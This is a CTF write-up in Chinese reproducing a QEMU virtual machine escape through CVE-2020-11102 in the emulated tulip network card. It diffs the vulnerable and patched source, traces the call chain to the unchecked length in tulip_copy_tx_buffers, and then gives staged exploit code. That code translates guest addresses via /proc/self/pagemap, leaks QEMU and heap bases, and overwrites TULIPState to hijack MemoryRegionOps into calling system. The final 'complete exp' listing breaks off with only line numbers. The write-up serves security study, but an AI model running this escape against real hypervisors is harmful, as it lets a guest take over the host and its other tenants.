0%

qemu escape+CVE-2020-11102

EscapefromtheEarth 复现

1
2
3
4
5
6
7
8
#!/bin/sh

./qemu-system-x86_64 -L ./dependency -kernel ./vmlinuz-4.15.0-208-generic -initrd ./rootfs.cpio -cpu kvm64,+smep \
-m 64M \
-monitor none \
-device tulip \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \
-nographic
1
2
3
4
5
6
#!/bin/sh
mount -t proc none /proc
mount -t sysfs none /sys
/sbin/mdev -s
insmod /tulip.ko
exec /bin/sh

启动内核发现是 root 权限:

1
2
3
4
/ # whoami
root
/ # id
uid=0(root) gid=0
  • 本题目提供了 qemu-system-x86_64,那极有可能是 qemu 逃逸

漏洞分析

qemu 逃逸一般在如下4个函数中出现 BUG:

  • pmio_read:读设备寄存器的物理地址(使用 in() 触发)
  • pmio_write:写设备寄存器的物理地址(使用 out() 触发)
  • mmio_read:读设备寄存器的虚拟地址(使用 mmap 映射物理内存,读这片区域时触发)
  • mmio_write:写设备寄存器的虚拟地址(使用 mmap 映射物理内存,写这片区域时触发)

但本题目并没有注册 mmio / pmio 的相关函数,题目提供的线索指向 CVE-2020-11102,并提供的 qemu 的编译过程:

1
2
3
4
5
6
wget https://download.qemu.org/qemu-4.2.0.tar.xz
xz -d ./qemu-4.2.0.tar.xz
tar -xvf ./qemu-4.2.0.tar
cp ./tulip.c ./qemu-4.2.0/hw/net/
#Then build qemu as normal
...
  • QEMU 4.2.0 版本中的 hw/net/tulip.c 文件存在缓冲区错误漏洞
  • 攻击者可利用该漏洞造成 QEMU 进程崩溃或可能以 QEMU 进程权限执行任意代码

于是我们去下载 QEMU 4.2.1 的源码,用 diff 判断一下程序修改了哪里:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
--- tulip.c	2023-03-29 14:50:12.000000000 +0800
+++ tulip2.c 2020-06-26 02:12:17.000000000 +0800
@@ -38,9 +38,9 @@

uint8_t rx_frame[2048];
uint8_t tx_frame[2048];
- int tx_frame_len;
- int rx_frame_len;
- int rx_frame_size;
+ uint16_t tx_frame_len;
+ uint16_t rx_frame_len;
+ uint16_t rx_frame_size;

uint32_t rx_status;
uint8_t filter[16][6];
@@ -58,9 +58,9 @@
VMSTATE_UINT64(current_tx_desc, TULIPState),
VMSTATE_BUFFER(rx_frame, TULIPState),
VMSTATE_BUFFER(tx_frame, TULIPState),
- VMSTATE_INT32(rx_frame_len, TULIPState),
- VMSTATE_INT32(tx_frame_len, TULIPState),
- VMSTATE_INT32(rx_frame_size, TULIPState),
+ VMSTATE_UINT16(rx_frame_len, TULIPState),
+ VMSTATE_UINT16(tx_frame_len, TULIPState),
+ VMSTATE_UINT16(rx_frame_size, TULIPState),
VMSTATE_UINT32(rx_status, TULIPState),
VMSTATE_UINT8_2DARRAY(filter, TULIPState, 16, 6),
VMSTATE_END_OF_LIST()
@@ -170,6 +170,7 @@
} else {
len = s->rx_frame_len;
}
+
pci_dma_write(&s->dev, desc->buf_addr1, s->rx_frame +
(s->rx_frame_size - s->rx_frame_len), len);
s->rx_frame_len -= len;
@@ -181,6 +182,7 @@
} else {
len = s->rx_frame_len;
}
+
pci_dma_write(&s->dev, desc->buf_addr2, s->rx_frame +
(s->rx_frame_size - s->rx_frame_len), len);
s->rx_frame_len -= len;
@@ -227,7 +229,8 @@

trace_tulip_receive(buf, size);

- if (size < 14 || size > 2048 || tulip_rx_stopped(s)) {
+ if (size < 14 || size > sizeof(s->rx_frame) - 4
+ || s->rx_frame_len || tulip_rx_stopped(s)) {
return 0;
}

@@ -275,7 +278,6 @@
return tulip_receive(qemu_get_nic_opaque(nc), buf, size);
}

-
static NetClientInfo net_tulip_info = {
.type = NET_CLIENT_DRIVER_NIC,
.size = sizeof(NICState),
@@ -558,7 +560,7 @@
if ((s->csr[6] >> CSR6_OM_SHIFT) & CSR6_OM_MASK) {
/* Internal or external Loopback */
tulip_receive(s, s->tx_frame, s->tx_frame_len);
- } else {
+ } else if (s->tx_frame_len <= sizeof(s->tx_frame)) {
qemu_send_packet(qemu_get_queue(s->nic),
s->tx_frame, s->tx_frame_len);
}
@@ -570,23 +572,31 @@
}
}

-static void tulip_copy_tx_buffers(TULIPState *s, struct tulip_descriptor *desc)
+static int tulip_copy_tx_buffers(TULIPState *s, struct tulip_descriptor *desc)
{
int len1 = (desc->control >> TDES1_BUF1_SIZE_SHIFT) & TDES1_BUF1_SIZE_MASK;
int len2 = (desc->control >> TDES1_BUF2_SIZE_SHIFT) & TDES1_BUF2_SIZE_MASK;

+ if (s->tx_frame_len + len1 > sizeof(s->tx_frame)) {
+ return -1;
+ }
if (len1) {
pci_dma_read(&s->dev, desc->buf_addr1,
s->tx_frame + s->tx_frame_len, len1);
s->tx_frame_len += len1;
}

+ if (s->tx_frame_len + len2 > sizeof(s->tx_frame)) {
+ return -1;
+ }
if (len2) {
pci_dma_read(&s->dev, desc->buf_addr2,
s->tx_frame + s->tx_frame_len, len2);
s->tx_frame_len += len2;
}
desc->status = (len1 + len2) ? 0 : 0x7fffffff;
+
+ return 0;
}

static void tulip_setup_filter_addr(TULIPState *s, uint8_t *buf, int n)
@@ -651,13 +661,15 @@

static void tulip_xmit_list_update(TULIPState *s)
{
+#define TULIP_DESC_MAX 128
+ uint8_t i = 0;
struct tulip_descriptor desc;

if (tulip_ts(s) != CSR5_TS_SUSPENDED) {
return;
}

- for (;;) {
+ for (i = 0; i < TULIP_DESC_MAX; i++) {
tulip_desc_read(s, s->current_tx_desc, &desc);
tulip_dump_tx_descriptor(s, &desc);

@@ -675,10 +687,10 @@
s->tx_frame_len = 0;
}

- tulip_copy_tx_buffers(s, &desc);
-
- if (desc.control & TDES1_LS) {
- tulip_tx(s, &desc);
+ if (!tulip_copy_tx_buffers(s, &desc)) {
+ if (desc.control & TDES1_LS) {
+ tulip_tx(s, &desc);
+ }
}
}
tulip_desc_write(s, s->current_tx_desc, &desc);

可以发现函数 tulip_copy_tx_buffers 中缺少了一个检查,核心代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
if (len1) {
pci_dma_read(&s->dev, desc->buf_addr1,
s->tx_frame + s->tx_frame_len, len1);
s->tx_frame_len += len1;
}

if (len2) {
pci_dma_read(&s->dev, desc->buf_addr2,
s->tx_frame + s->tx_frame_len, len2);
s->tx_frame_len += len2;
}
desc->status = (len1 + len2) ? 0 : 0x7fffffff;
  • tulip_copy_tx_buffers 是一个 TULIP 库中的函数,用于将设备驱动程序中的数据传输到网络适配器的物理内存中
  • 当我们多次调用 tulip_copy_tx_buffers 时,s->tx_frame_len 可能被加到一个非常大的值

未对虚拟机传入的长度字段进行校验,导致产生了针对 tx_framerx_framd 的数组越界写,这两个数组都是结构体 TULIPState 的条目:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
typedef struct TULIPState
{
PCIDevice dev; /* PCI设备结构体的指针,用于存储设备的硬件信息 */
MemoryRegion io; /* 内存区域结构体的指针,用于存储设备的I/O地址空间 */
MemoryRegion memory; /* 内存区域结构体的指针,用于存储设备的内存地址空间 */
NICConf c;
qemu_irq irq; /* qemu中断结构体的指针,用于存储网络适配器的中断 */
NICState *nic;
eeprom_t *eeprom;
uint32_t csr[16]; /* 16个32位寄存器数组,用于存储网络适配器的寄存器值 */

/* state for MII */
uint32_t old_csr9;
uint32_t mii_word;
uint32_t mii_bitcnt;

hwaddr current_rx_desc; /* 接收描述符的硬件地址 */
hwaddr current_tx_desc; /* 发送描述符的硬件地址 */

uint8_t rx_frame[2048]; /* 接收缓冲区,用于存储接收到的数据 */
uint8_t tx_frame[2048]; /* 发送缓冲区,用于存储待发送的数据 */
int tx_frame_len; /* 发送缓冲区中已发送的数据长度 */
int rx_frame_len; /* 接收缓冲区中已接收的数据长度 */
int rx_frame_size; /* 接收缓冲区中数据帧的大小 */

uint32_t rx_status; /* 接收状态寄存器,用于存储接收状态信息 */
uint8_t filter[16][6]; /* 一个16行6列的数组,用于存储过滤器 */
} TULIPState;

程序分析

本题目找不到 tulip.ko 的设备标识符:

1
2
3
/ # find . -name tulip
./sys/bus/pci/drivers/tulip
./sys/module/tulip

IDA 分析发现,tulip.ko 只注册了驱动,但是没有注册设备标识符:(其实 Qemu 逃逸类题目和内核题目不同,大多数时候都不需要设备标识符)

1
2
3
4
5
6
7
8
9
10
11
12
13
__int64 __fastcall tulip_init(__int64 a1, __int64 a2)
{
_fentry__(a1, a2);
printk(&unk_94CF, version);
if ( !csr0 )
{
printk(&unk_A6F0, version);
csr0 = 0xA04800;
}
tulip_rx_copybreak = rx_copybreak;
tulip_max_interrupt_work = max_interrupt_work;
return _pci_register_driver(&tulip_driver, &_this_module, "tulip");
}

先使用 info pci 查看 qemu 的 PCI 设备:

1
2
3
4
5
6
7
Bus  0, device   4, function 0:
Ethernet controller: PCI device 1011:0019
PCI subsystem 103c:104f
IRQ 11.
BAR0: I/O at 0xc000 [0xc07f].
BAR1: 32 bit memory at 0xfebf1000 [0xfebf107f].
id ""
  • 需要先在 run.sh 中添加 -monitor telnet:127.0.0.1:4444,server,nowait 选项
  • 然后使用 nc 127.0.0.1 4444info pci 进行查看

基于 0xc000 我们就可以使用 pmio 来调用 tulip_readtulip_write

1
2
3
4
5
6
7
8
9
static const MemoryRegionOps tulip_ops = {
.read = tulip_read,
.write = tulip_write,
.endianness = DEVICE_LITTLE_ENDIAN,
.impl = {
.min_access_size = 4,
.max_access_size = 4,
},
};

函数 tulip_write 的功能较为复杂,这里只分析我们需要的部分:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#define CSR6_FC         BIT(12)
#define CSR6_ST BIT(13)

static void tulip_write(void *opaque, hwaddr addr,
uint64_t data, unsigned size)
{
TULIPState *s = opaque;
trace_tulip_reg_write(addr, tulip_reg_name(addr), size, data);

switch (addr)
{
......

case CSR(3):
s->csr[3] = data & ~3ULL;
s->current_rx_desc = s->csr[3]; /* 设置接收描述符的硬件地址 */
qemu_flush_queued_packets(qemu_get_queue(s->nic)); /* 刷新网络适配器队列 */
break;

case CSR(4):
s->csr[4] = data & ~3ULL;
s->current_tx_desc = s->csr[4]; /* 设置接收描述符的硬件地址 */
tulip_xmit_list_update(s); /* 间接调用漏洞函数 */
break;

case CSR(5):
/* Status register, write clears bit */
s->csr[5] &= ~(data & (CSR5_TI | CSR5_TPS | CSR5_TU | CSR5_TJT |
CSR5_LNP_ANC | CSR5_UNF | CSR5_RI | CSR5_RU |
CSR5_RPS | CSR5_RWT | CSR5_ETI | CSR5_GTE |
CSR5_LNF | CSR5_FBE | CSR5_ERI | CSR5_AIS |
CSR5_NIS | CSR5_GPI | CSR5_LC));
tulip_update_int(s);
break;

case CSR(6):
s->csr[6] = data;
if (s->csr[6] & CSR6_SR)
{
tulip_update_rs(s, CSR5_RS_RUNNING_WAIT_RECEIVE);
qemu_flush_queued_packets(qemu_get_queue(s->nic));
}
else
{
tulip_update_rs(s, CSR5_RS_STOPPED);
}

if (s->csr[6] & CSR6_ST)
{
tulip_update_ts(s, CSR5_TS_SUSPENDED);
tulip_xmit_list_update(s); /* 间接调用漏洞函数 */
}
else
{
tulip_update_ts(s, CSR5_TS_STOPPED);
}
break;

......

default:
qemu_log_mask(LOG_GUEST_ERROR, "%s: write to CSR at unknown address "
"0x%" PRIx64 "\n",
__func__, addr);
break;
}
}

函数 tulip_xmit_list_update 会间接调用漏洞函数,我们可以分析一下调用链:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
static void tulip_xmit_list_update(TULIPState *s)
{
struct tulip_descriptor desc;

if (tulip_ts(s) != CSR5_TS_SUSPENDED) /* 如果网络适配器不处于暂停状态,则返回 */
{
return;
}

for (;;)
{
tulip_desc_read(s, s->current_tx_desc, &desc); /* 从s->current_tx_desc中读取网络适配器的描述符,并写入desc */
tulip_dump_tx_descriptor(s, &desc); /* 执行PCI DMA操作 */

......

if (desc.control & TDES1_SET)
{
......
}
else
{
......
tulip_copy_tx_buffers(s, &desc); /* 调用漏洞函数 */
if (desc.control & TDES1_LS)
{
tulip_tx(s, &desc); /* 将数据发送到网络适配器 */
}
}
tulip_desc_write(s, s->current_tx_desc, &desc);
tulip_next_tx_descriptor(s, &desc);
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
static void tulip_copy_tx_buffers(TULIPState *s, struct tulip_descriptor *desc)
{
int len1 = (desc->control >> TDES1_BUF1_SIZE_SHIFT) & TDES1_BUF1_SIZE_MASK;
int len2 = (desc->control >> TDES1_BUF2_SIZE_SHIFT) & TDES1_BUF2_SIZE_MASK;

if (len1)
{
pci_dma_read(&s->dev, desc->buf_addr1,
s->tx_frame + s->tx_frame_len, len1);
/* 从地址desc->buf_addr1处,传输数据到主机内存tx_frame + tx_frame_len */
s->tx_frame_len += len1;
}

if (len2)
{
pci_dma_read(&s->dev, desc->buf_addr2,
s->tx_frame + s->tx_frame_len, len2);
s->tx_frame_len += len2;
}
desc->status = (len1 + len2) ? 0 : 0x7fffffff;
}

  • 调用链为:tulip_write -> tulip_xmit_list_update -> tulip_copy_tx_buffers -> pci_dma_read
  • 条件为:tulip_ts(s) == CSR5_TS_SUSPENDED

在设置了 TDES1_LS 后,则会调用 tulip_tx 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
static void tulip_tx(TULIPState *s, struct tulip_descriptor *desc)
{
if (s->tx_frame_len) {
if ((s->csr[6] >> CSR6_OM_SHIFT) & CSR6_OM_MASK) {
/* Internal or external Loopback */
tulip_receive(s, s->tx_frame, s->tx_frame_len);
} else {
qemu_send_packet(qemu_get_queue(s->nic),
s->tx_frame, s->tx_frame_len);
}
}

if (desc->control & TDES1_IC) {
s->csr[5] |= CSR5_TI;
tulip_update_int(s);
}
}

  • 在通过 s->csr[6] >> CSR6_OM_SHIFT) & CSR6_OM_MASK 条件后则会调用 tulip_receive
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
static ssize_t tulip_receive(TULIPState *s, const uint8_t *buf, size_t size)
{
struct tulip_descriptor desc;

trace_tulip_receive(buf, size);

if (size < 14 || size > 2048 || tulip_rx_stopped(s)) {
return 0;
}

if (!tulip_filter_address(s, buf)) {
return size;
}

do {
tulip_desc_read(s, s->current_rx_desc, &desc);
tulip_dump_rx_descriptor(s, &desc);

if (!(desc.status & RDES0_OWN)) {
s->csr[5] |= CSR5_RU;
tulip_update_int(s);
return s->rx_frame_size - s->rx_frame_len;
}
desc.status = 0;

if (!s->rx_frame_len) {
s->rx_frame_size = size + 4;
s->rx_status = RDES0_LS |
((s->rx_frame_size & RDES0_FL_MASK) << RDES0_FL_SHIFT);
desc.status |= RDES0_FS;
memcpy(s->rx_frame, buf, size);
s->rx_frame_len = s->rx_frame_size;
}

tulip_copy_rx_bytes(s, &desc); /* 将接收到的数据从接收缓冲区复制到用户提供的缓冲区中 */

if (!s->rx_frame_len) {
desc.status |= s->rx_status;
s->csr[5] |= CSR5_RI;
tulip_update_int(s);
}
tulip_dump_rx_descriptor(s, &desc);
tulip_desc_write(s, s->current_rx_desc, &desc);
tulip_next_rx_descriptor(s, &desc);
} while (s->rx_frame_len);
return size;
}

函数 tulip_copy_rx_bytes 的作用和 tulip_copy_tx_buffers 相反:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
static void tulip_copy_rx_bytes(TULIPState *s, struct tulip_descriptor *desc)
{
int len1 = (desc->control >> RDES1_BUF1_SIZE_SHIFT) & RDES1_BUF1_SIZE_MASK;
int len2 = (desc->control >> RDES1_BUF2_SIZE_SHIFT) & RDES1_BUF2_SIZE_MASK;
int len;

if (s->rx_frame_len && len1)
{
if (s->rx_frame_len > len1)
{
len = len1;
}
else
{
len = s->rx_frame_len;
}
pci_dma_write(&s->dev, desc->buf_addr1, s->rx_frame + (s->rx_frame_size - s->rx_frame_len), len);
/* 从主机内存rx_frame + rx_frame_size - rx_frame_len处读取数据 */
s->rx_frame_len -= len;
}

if (s->rx_frame_len && len2)
{
if (s->rx_frame_len > len2)
{
len = len2;
}
else
{
len = s->rx_frame_len;
}
pci_dma_write(&s->dev, desc->buf_addr2, s->rx_frame + (s->rx_frame_size - s->rx_frame_len), len);
s->rx_frame_len -= len;
}
}
  • tulip_copy_rx_bytes 中也同样没有检查 size 范围,可以将 rx_frame 后的数据读取到用户空间

核心结构体 tulip_descriptor 的代码如下:

1
2
3
4
5
6
struct tulip_descriptor {
uint32_t status;
uint32_t control;
uint32_t buf_addr1;
uint32_t buf_addr2;
};

入侵思路

tulip_xmit_list_update 中会从 current_tx_desc 中读取网络适配器的描述符:

1
2
tulip_desc_read(s, s->current_tx_desc, &desc); /* 从s->current_tx_desc中读取网络适配器的描述符,并写入desc */
tulip_dump_tx_descriptor(s, &desc);
  • 此时 tulip_desc_read 函数需要传入物理地址

我们可以通过 /proc/self/pagemap 计算出物理地址:

1
2
3
4
5
6
fd = open("/proc/self/pagemap", O_RDONLY);
if (fd < 0) {
perror("open");
exit(1);
}

1
2
3
4
uint32_t page_offset(uint32_t addr) {
return addr & ((1 << PAGE_SHIFT) - 1);
}

1
2
3
4
5
6
7
8
9
10
11
12
uint64_t gva_to_gfn(void *addr) {
uint64_t pme, gfn;
size_t offset;
offset = ((uintptr_t)addr >> 9) & ~7;
lseek(fd, offset, SEEK_SET);
read(fd, &pme, 8);
if (!(pme & PFN_PRESENT))
return -1;
gfn = pme & PFN_PFN;
return gfn;
}

1
2
3
4
5
6
uint64_t gva_to_gpa(void *addr) {
uint64_t gfn = gva_to_gfn(addr);
assert(gfn != -1);
return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}

如果我们将 tx_frame_len 设置为 0x800,那么接下来往 tx_frame[2048] 中写的数据就可能会向下溢出

下面是测试代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
int len1 = 0x400 << 0;
int len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
/* (1UL << 29)为TDES1_FS: 执行"tx_frame_len = 0" */
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

pmio_writel(CSR(6), 1u << 13); /* (1u << 13)为CSR6_ST: 设置CSR5_TS_SUSPENDED */

sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); /* 读取tx_desc为网络适配器的描述符,tx_frame_len将变为0x400 */

printf("[*] fill tx_frame\n");

sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa); /* 读取tx_desc为网络适配器的描述符,tx_frame_len将变为0x800 */

接着我们就可以通过 pci_dma_read 函数修改 TULIPState->tx_frame 往后的数据,然后利用 pci_dma_write 泄露数据:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);
pmio_write(CSR(6), 0x800 | (1u << 13) | (1u << 1));
/* 0x800: 使"s->csr[6] >> CSR6_OM_SHIFT) & CSR6_OM_MASK"成立,从而使tulip_tx能够调用tulip_receive */
/* (1u << 13)为CSR6_ST: 设置CSR5_TS_SUSPENDED */
/* (1u << 1)为CSR6_SR: 设置CSR5_RS_RUNNING_WAIT_RECEIVE */

sleep(1);
printf("[*] OOB write tx_frame_len...\n");

int rx_len1, rx_len2;
rx_len1 = 0x400;
rx_len2 = 0;
rx_desc->status = (1UL << 31) | (1UL << 24); // RDES0_OWN
rx_desc->buf_addr1 = gva_to_gpa(recv_buf);
rx_desc->buf_addr2 = 0x180;
rx_desc->control = rx_len2 | rx_len1 | (1UL << 24) | (1UL << 30);

// set rx descriptor
sleep(1);
uint64_t rx_desc_gpa = gva_to_gpa(rx_desc);
printf("[*] rx_desc_gpa: 0x%lx\n", rx_desc_gpa);
pmio_writel(CSR(3), rx_desc_gpa); /* 设置rx_desc */

struct oob_data { /* 描述TULIPState->tx_frame的后续数据 */
int tx_frame_len;
int rx_frame_len;
int rx_frame_size;

uint32_t rx_status;
uint8_t filter[16][6];
};
len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = 0x400 - len1; /* 伪造>tx_frame_len为0x400 */
oob_data->rx_frame_len = 0x900;
oob_data->rx_frame_size = 2048*2 + 0x900; /* 使rx_frame发生溢出 */
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 'A';
oob_data->filter[i][1] = 'A';
oob_data->filter[i][2] = 'A';
oob_data->filter[i][3] = 'A';
oob_data->filter[i][4] = 'A';
oob_data->filter[i][5] = 'A';
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24) | (1UL << 30);

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); /* 设置tx_desc(覆盖TULIPState) */

printf("[+] leak\n");
char *cur = (char *)recv_buf;
for (int i = 0; i < 50; ++i) {
printf("0x%016lx 0x%016lx\n", *(size_t *)cur, *(size_t *)(cur+8));
cur += 16;
}
cur = (char *)recv_buf;
uint64_t qemu_base = ((uint64_t *)cur)[0x1d] - 0x755f9f;
uint64_t heap_base = ((uint64_t *)cur)[22] - 0xe11380;
uint64_t qemu_plt_system = qemu_base+2859620;
uint64_t frame_base = heap_base+0xe0fcf0;
printf("[*] continue...\n");
printf("[+] qemu_base: 0x%lx\n", qemu_base);
printf("[+] heap_base: 0x%lx\n", heap_base);

泄露 libc_base 和 heap_base 以后,我们就可以劫持并伪造 TULIPState->MemoryRegion->MemoryRegionOps 来执行我们需要的函数:

1
2
3
4
5
6
struct MemoryRegion {
......
const MemoryRegionOps *ops;
......
};

测试代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
printf("[*] enter stage2\n"); {
len1 = 0x400 << 0;
len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
/* (1UL << 29)为TDES1_FS: 执行"tx_frame_len = 0" */
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

pmio_writel(CSR(6), 1u << 13); /* (1u << 13)为CSR6_ST: 设置CSR5_TS_SUSPENDED */

sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); /* 读取tx_desc为网络适配器的描述符,tx_frame_len将变为0x400 */

printf("[*] fill tx_frame\n");

sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa); /* 读取tx_desc为网络适配器的描述符,tx_frame_len将变为0x800 */

printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);

len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = -0x3350 - 0x70; /* 向上溢出 */
oob_data->rx_frame_len = 0;
oob_data->rx_frame_size = 0;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 0xff;
oob_data->filter[i][1] = 0xff;
oob_data->filter[i][2] = 0xff;
oob_data->filter[i][3] = 0xff;
oob_data->filter[i][4] = 0xff;
oob_data->filter[i][5] = 0xff;
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);

sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); /* 设置tx_desc(覆盖TULIPState) */

sleep(1);
uint64_t *binsh = (uint64_t *)malloc(0x200);
binsh[0] = 7449354444534473059; // catflag
binsh[1] = 0;
len1 = 16;
len2 = 0;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(binsh);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_writel(CSR(4), tx_desc_gpa);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
printf("[*] enter stage3\n"); {
((uint64_t *)buf)[0] = qemu_plt_system;
((uint64_t *)buf)[1] = qemu_plt_system;

((uint64_t *)buf)[2] = 0;
((uint64_t *)buf)[3] = 0;

((uint64_t *)buf)[4] = 2;
((uint64_t *)buf)[5] = 0;

((uint64_t *)buf)[6] = 0;
((uint64_t *)buf)[7] = 0;

((uint64_t *)buf)[8] = 0x0000000400000004;
((uint64_t *)buf)[9] = 0;

((uint64_t *)buf)[10] = 0;
((uint64_t *)buf)[11] = 0;
len1 = 0x400 << 0;
len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
/* (1UL << 29)为TDES1_FS: 执行"tx_frame_len = 0" */
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

pmio_writel(CSR(6), 1u << 13); /* (1u << 13)为CSR6_ST: 设置CSR5_TS_SUSPENDED */

sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); /* 读取tx_desc为网络适配器的描述符,tx_frame_len将变为0x400 */

printf("[*] fill tx_frame\n");

sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa); /* 读取tx_desc为网络适配器的描述符,tx_frame_len将变为0x800 */

printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);

len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = -0x2a28-0x70; // 指向MemoryRegion.ops
oob_data->rx_frame_len = 0;
oob_data->rx_frame_size = 0;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 0xff;
oob_data->filter[i][1] = 0xff;
oob_data->filter[i][2] = 0xff;
oob_data->filter[i][3] = 0xff;
oob_data->filter[i][4] = 0xff;
oob_data->filter[i][5] = 0xff;
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);

sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); /* 设置tx_desc(覆盖TULIPState) */

sleep(1);
printf("[*] hijack ops\n");
uint64_t *fake_memory_region_ops = (uint64_t *)malloc(0x200);
fake_memory_region_ops[0] = frame_base;
len1 = 8;
len2 = 0;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(fake_memory_region_ops);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_writel(CSR(4), tx_desc_gpa); /* 覆盖ops.write */

pmio_writel(CSR(4), tx_desc_gpa); /* 触发ops.write */
}

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
